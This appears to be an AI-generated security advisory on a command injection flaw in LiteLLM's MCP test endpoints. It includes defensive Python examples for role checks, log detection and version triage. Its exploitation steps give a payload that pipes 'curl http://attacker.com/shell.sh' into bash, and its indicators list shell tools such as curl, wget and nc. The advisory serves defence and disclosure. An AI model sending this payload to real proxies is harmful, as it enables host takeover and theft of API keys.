CVE-2026-42271
NixOS Vulnerability Analysis and Mitigation

Overview

CVE-2026-42271 is an authenticated command injection vulnerability in LiteLLM (BerriAI), an AI Gateway/proxy server for calling LLM APIs. Affecting versions 1.74.2 up to, but not including, 1.83.7, the flaw allows any authenticated user holding a valid proxy API key — including low-privilege internal-user keys — to execute arbitrary OS commands on the proxy host. The vulnerability was published on May 8, 2026, and patched in version 1.83.7. It carries a CVSS v3.1 base score of 8.8 (High) and a CVSS v4.0 base score of 8.7 (High) (GitHub Advisory, Feedly).

Technical Details

The root cause is improper neutralization of special elements used in an OS command (CWE-78 / CWE-77), classified as OS Command Injection. Two MCP server test endpoints — POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list — accepted a full server configuration in the request body, including command, args, and env fields used by the stdio transport. When invoked with a stdio-type configuration, the endpoints spawned the supplied command as a subprocess on the proxy host with the privileges of the LiteLLM proxy process. Critically, these endpoints were gated only by a valid proxy API key with no role-based access control (RBAC) check, meaning any authenticated user — not just administrators — could trigger arbitrary command execution (GitHub Advisory). The fix in v1.83.7 restricts both test endpoints to the PROXY_ADMIN role, aligning them with the save endpoint (LiteLLM Release).
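The authorization defect described above is easiest to see side by side with its fix. The following Python is an added, constructed example; it is not LiteLLM's code, and the key table, key values and handler names are assumptions. Both handlers model an MCP test endpoint that accepts a server configuration: the "vulnerable" one only checks that the bearer key is valid, so a low-privilege key can submit a stdio configuration whose command would be spawned; the "fixed" one additionally requires the PROXY_ADMIN role, as the 1.83.7 release does. Nothing is executed here: the argv that would have been spawned is recorded in a list so the difference is inspectable.

```python
"""Constructed illustration (not LiteLLM's code) of the missing RBAC check
behind CVE-2026-42271 and of the role gate that fixes it."""
from typing import Any

PROXY_ADMIN = "proxy_admin"       # role name used by the advisory
INTERNAL_USER = "internal_user"   # assumed low-privilege role name

# Constructed key -> role table standing in for the proxy's key store.
KEY_ROLES = {
    "sk-admin-0001": PROXY_ADMIN,
    "sk-user-0002": INTERNAL_USER,
}


class AuthError(Exception):
    """No valid proxy API key was presented."""


class Forbidden(Exception):
    """The key is valid but the caller's role is not permitted."""


def authenticate(authorization: str) -> str:
    """Resolve 'Authorization: Bearer <key>' to a role.
    This was the only gate the vulnerable endpoints had."""
    if not authorization.startswith("Bearer "):
        raise AuthError("missing bearer token")
    key = authorization[len("Bearer "):].strip()
    if key not in KEY_ROLES:
        raise AuthError("unknown key")
    return KEY_ROLES[key]


def _would_spawn(config: dict[str, Any], spawned: list[list[str]]) -> None:
    """Record the argv a stdio transport would launch, instead of launching it."""
    if config.get("transport") == "stdio":
        argv = [str(config["command"]), *map(str, config.get("args", []))]
        spawned.append(argv)


def mcp_test_vulnerable(authorization: str, config: dict[str, Any],
                        spawned: list[list[str]]) -> dict[str, str]:
    """Pre-1.83.7 behaviour: authentication only, no role check."""
    authenticate(authorization)
    _would_spawn(config, spawned)
    return {"status": "ok"}


def require_role(role: str, required: str) -> None:
    """Reject callers whose role is not the required one."""
    if role != required:
        raise Forbidden(f"{required} role required, caller has {role}")


def mcp_test_fixed(authorization: str, config: dict[str, Any],
                   spawned: list[list[str]]) -> dict[str, str]:
    """1.83.7 behaviour: the test endpoint is restricted to PROXY_ADMIN."""
    role = authenticate(authorization)
    require_role(role, PROXY_ADMIN)
    _would_spawn(config, spawned)
    return {"status": "ok"}


# Constructed request body in the shape the advisory describes. The command is
# a harmless placeholder and is never executed by this example.
SAMPLE_STDIO_CONFIG = {
    "transport": "stdio",
    "command": "/usr/bin/env",
    "args": ["true"],
    "env": {},
}


def demo() -> dict[str, Any]:
    """Exercise both handlers with a low-privilege key and an admin key."""
    results: dict[str, Any] = {}
    spawned: list[list[str]] = []

    mcp_test_vulnerable("Bearer sk-user-0002", SAMPLE_STDIO_CONFIG, spawned)
    results["vulnerable_spawned"] = list(spawned)   # low-priv key reached spawn
    spawned.clear()

    try:
        mcp_test_fixed("Bearer sk-user-0002", SAMPLE_STDIO_CONFIG, spawned)
        results["fixed_low_priv"] = "allowed"
    except Forbidden:
        results["fixed_low_priv"] = "forbidden"

    mcp_test_fixed("Bearer sk-admin-0001", SAMPLE_STDIO_CONFIG, spawned)
    results["fixed_admin"] = "allowed"
    results["fixed_spawned"] = list(spawned)        # only the admin call got here
    return results


if __name__ == "__main__":
    print(demo())
```

The point of the comparison is that the vulnerable handler's only decision is "is this key valid?", which every key holder passes; the fix adds the "is this caller an administrator?" decision that the save endpoint already had.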

Impact

Successful exploitation grants an attacker arbitrary command execution on the proxy host with the privileges of the LiteLLM proxy process, resulting in full compromise of confidentiality, integrity, and availability of the affected system. An attacker can exfiltrate sensitive data including LLM API keys, model configurations, and user data stored or accessible by the proxy; modify system files or configurations; or disrupt service availability. When chained with CVE-2026-48710 (a Starlette host header injection flaw), the attack can escalate to unauthenticated remote code execution, significantly broadening the attack surface and enabling lateral movement within enterprise AI infrastructure (Rescana, Horizon3).

Exploitation Steps

  1. Reconnaissance: Identify internet-facing LiteLLM proxy instances (versions 1.74.2–1.83.6) using Shodan, Censys, or similar tools by searching for LiteLLM-specific HTTP response headers or API endpoints.
  2. Obtain a valid API key: Acquire any valid proxy API key — including low-privilege internal-user keys obtained via free trial, social engineering, or credential theft — since no elevated role is required.
  3. Craft the malicious request: Construct a POST request to either /mcp-rest/test/connection or /mcp-rest/test/tools/list with a JSON body specifying a stdio-type MCP server configuration, embedding the desired OS command in the command and args fields. Example payload:
{
  "transport": "stdio",
  "command": "/bin/bash",
  "args": ["-c", "curl http://attacker.com/shell.sh | bash"],
  "env": {}
}
  4. Authenticate and send: Include the API key in the Authorization: Bearer <key> header and send the request to the target LiteLLM proxy.
  5. Achieve code execution: The proxy spawns the supplied command as a subprocess with its own process privileges, executing the attacker's payload on the host.
  6. Chain for unauthenticated access (optional): Combine with CVE-2026-48710 (Starlette host header injection) to bypass authentication requirements entirely, enabling unauthenticated RCE (Horizon3, GitHub Advisory).

Indicators of Compromise

  • Network: Unexpected outbound connections from the LiteLLM proxy host to external IPs (e.g., attacker C2 servers) shortly after POST requests to /mcp-rest/test/connection or /mcp-rest/test/tools/list; unusual DNS lookups from the proxy process.
  • Logs: HTTP access logs showing POST requests to /mcp-rest/test/connection or /mcp-rest/test/tools/list from non-administrative API keys; repeated or automated requests to these endpoints from a single source IP; LiteLLM application logs showing subprocess spawn events with unexpected command strings.
  • Process: Unusual child processes spawned by the LiteLLM Python process (e.g., /bin/bash, sh, curl, wget, python, nc) that are not part of normal proxy operation; processes running under the LiteLLM service account performing network connections.
  • File System: New or modified files in the LiteLLM installation directory or system temp directories (e.g., dropped scripts, web shells, or binaries); new cron jobs or systemd services created by the proxy service account.
  • Registry/Config: Unexpected modifications to LiteLLM configuration files or environment variable files containing new or altered API keys or callback URLs.
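The log indicators above can be turned into a simple scan. The Python below is an added example, not part of the original advisory or of LiteLLM: it reads proxy access log lines and flags (a) POST requests to the two MCP test endpoints from keys that do not hold the admin role and (b) bursts of requests to those endpoints from a single source IP. The log line format and all sample lines are constructed for this example; the regex must be adapted to whatever access log format a real deployment emits.

```python
"""Constructed detection example for the CVE-2026-42271 log indicators."""
import re
from collections import defaultdict
from datetime import datetime

MCP_TEST_PATHS = {"/mcp-rest/test/connection", "/mcp-rest/test/tools/list"}
ADMIN_ROLE = "proxy_admin"   # role name from the advisory

# Constructed line format: <iso-ts> <client-ip> "<METHOD> <path>" <status> role=<role>
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" '
    r'(?P<status>\d{3}) role=(?P<role>\S+)$'
)

# Constructed sample: one benign call, a three-request burst from an external
# IP using a low-privilege key, one legitimate admin test, and a junk line.
SAMPLE_LOG = """\
2026-06-09T10:00:01Z 10.0.0.5 "POST /chat/completions" 200 role=internal_user
2026-06-09T10:00:05Z 203.0.113.7 "POST /mcp-rest/test/connection" 200 role=internal_user
2026-06-09T10:00:07Z 203.0.113.7 "POST /mcp-rest/test/tools/list" 200 role=internal_user
2026-06-09T10:00:09Z 203.0.113.7 "POST /mcp-rest/test/connection?x=1" 200 role=internal_user
2026-06-09T10:05:00Z 10.0.0.9 "POST /mcp-rest/test/connection" 200 role=proxy_admin
this line is not an access log record
2026-06-09T10:06:00Z 10.0.0.5 "GET /health" 200 role=internal_user
"""


def parse_line(line: str):
    """Return a dict for a well-formed record, or None for anything else."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    rec["path"] = rec["path"].split("?", 1)[0]   # drop query string before matching
    return rec


def detect(lines, burst_threshold: int = 3, window_seconds: int = 60):
    """Scan log lines and return a list of findings (dicts with a 'rule' key)."""
    findings = []
    hits_by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] not in MCP_TEST_PATHS:
            continue
        hits_by_ip[rec["ip"]].append(rec["ts"])
        if rec["role"] != ADMIN_ROLE:
            # Indicator: test endpoint reached by a non-administrative key.
            findings.append({"rule": "non_admin_mcp_test", "ip": rec["ip"],
                             "ts": rec["ts"].isoformat(), "path": rec["path"]})
    for ip, times in hits_by_ip.items():
        times.sort()
        # Indicator: burst_threshold requests inside a window from one IP.
        for i in range(len(times) - burst_threshold + 1):
            if (times[i + burst_threshold - 1] - times[i]).total_seconds() <= window_seconds:
                findings.append({"rule": "mcp_test_burst", "ip": ip,
                                 "ts": times[i].isoformat(), "count": burst_threshold})
                break
    return findings


def run_sample():
    """Run the detector over the constructed sample log."""
    return detect(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for f in run_sample():
        print(f)
```

After upgrading, every non-admin hit on these endpoints should be a 403 rather than a 200, so the role-based rule remains useful as a regression check even once the burst rule stops firing.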

Mitigation and Workarounds

Upgrade LiteLLM to version 1.83.7 or later immediately; this release restricts POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list to the PROXY_ADMIN role, eliminating the privilege escalation path (LiteLLM Release, GitHub Advisory). If immediate upgrading is not possible, block POST requests to /mcp-rest/test/connection and /mcp-rest/test/tools/list at your reverse proxy, API gateway, or WAF. Additionally, restrict network access to the LiteLLM proxy to trusted networks only, implement strict API key management by limiting distribution of proxy API keys to only necessary services, and audit existing key holders for unauthorized access. Monitor the affected endpoints for suspicious activity as a compensating control.
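Deciding which instances need the upgrade starts with comparing each deployed version against the affected range stated in this report (1.74.2 inclusive to 1.83.7 exclusive). The Python below is an added example, not from the advisory or from LiteLLM; the inventory hosts and version strings are constructed, and the tolerance for a leading "v" or a trailing suffix such as "-stable" is an assumption about how version strings may appear in practice.

```python
"""Constructed fleet-triage helper for the CVE-2026-42271 affected range."""
import re

AFFECTED_FROM = (1, 74, 2)   # first affected version (inclusive)
FIXED_IN = (1, 83, 7)        # first fixed version (exclusive upper bound)

# Accept "1.83.6", "v1.83.6" and "1.83.6-anything"; only the numeric core matters.
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> tuple:
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    return tuple(int(part) for part in m.groups())


def is_affected(version: str) -> bool:
    """True when 1.74.2 <= version < 1.83.7, compared numerically per component."""
    return AFFECTED_FROM <= parse_version(version) < FIXED_IN


# Constructed inventory: hostname -> reported LiteLLM version.
INVENTORY = {
    "prod-gw-1": "1.83.6",
    "prod-gw-2": "1.83.7",
    "dev-gw": "1.74.1",
    "legacy-gw": "v1.80.0-stable",
    "staging-gw": "unknown",
}


def triage(inventory: dict) -> dict:
    """Bucket hosts into affected / not_affected / unknown (unparseable version)."""
    report = {"affected": [], "not_affected": [], "unknown": []}
    for host, version in sorted(inventory.items()):
        try:
            bucket = "affected" if is_affected(version) else "not_affected"
        except ValueError:
            bucket = "unknown"   # needs a manual check rather than silent pass
        report[bucket].append(host)
    return report


if __name__ == "__main__":
    for bucket, hosts in triage(INVENTORY).items():
        print(f"{bucket}: {', '.join(hosts) or '-'}")
```

Hosts in the "unknown" bucket deserve the same attention as affected ones until their version is confirmed; a triage that silently treats unparseable versions as safe would hide exactly the forgotten instances that get exploited.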

Community Reaction

CISA added CVE-2026-42271 to its KEV catalog on June 8, 2026, issuing an alert urging immediate remediation (CISA Alert). The Hacker News covered the active exploitation, noting the chaining with CVE-2026-48710 to achieve unauthenticated RCE (The Hacker News). Security researchers on Reddit, Mastodon, and Bluesky highlighted the severity of the vulnerability in AI gateway infrastructure, with some describing it as a "CVSS 10.0 RCE chain" when combined with the Starlette flaw. Horizon3.ai published a detailed attack research post covering the chained exploitation scenario (Horizon3). SOCRadar and HelpNetSecurity also covered the KEV addition and active exploitation context (SOCRadar, HelpNetSecurity).

This report was generated using AI.
